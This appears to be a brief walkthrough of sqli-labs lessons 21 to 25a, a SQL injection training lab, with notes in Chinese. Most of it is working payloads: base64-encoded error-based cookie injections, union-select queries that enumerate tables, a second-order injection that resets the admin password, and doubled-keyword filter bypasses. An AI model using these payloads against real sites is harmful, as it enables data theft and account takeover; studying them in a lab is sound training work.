Advanced Injections
Less-21 Cookie Injection- Error Based- complex - string
同样是cookie,不同的是使用base64加密
payload:abc')and extractvalue(0x7e,concat(0x7e,user(),0x7e))#
加密后:YWJjJylhbmQgZXh0cmFjdHZhbHVlKDB4N2UsY29uY2F0KDB4N2UsdXNlcigpLDB4N2UpKSM=
Less-22 Cookie Injection- Error Based- Double Quotes - string
payload:abc"and extractvalue(0x7e,concat(0x7e,database(),0x7e))#
加密后:YWJjImFuZCBleHRyYWN0dmFsdWUoMHg3ZSxjb25jYXQoMHg3ZSxkYXRhYmFzZSgpLDB4N2UpKSM=
Less-23 Error Based- no comments
payload:id=-1' union select 1,(database()),3'
payload:id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3'
Less-24 Second Degree Injections
现在数据库中并没有admin’#这个账户
在网站上注册了一个admin’#的账户
登录admin’#以后,修改密码,修改完成以后发现admin的密码被修改了。
大佬的解释:本关为二次排序注入的示范例。二次排序注入也成为存储型的注入,就是将可能导致 sql 注入的字符先存入到数据库中,当再次调用这个恶意构造的字符时,就可以出发 sql 注入。
Less-25 Trick with OR & AND
payload:id=1' || extractvalue(0x7e,concat(0x7e,database(),0x7e))-- +
题目提示了or和and被过滤
Less-25a Trick with OR & AND Blind
payload:-1 union select 1,(select group_concat(table_name)from infoorrmation_schema.tables where table_schema='security'),3%23
使用双写绕过代码的过滤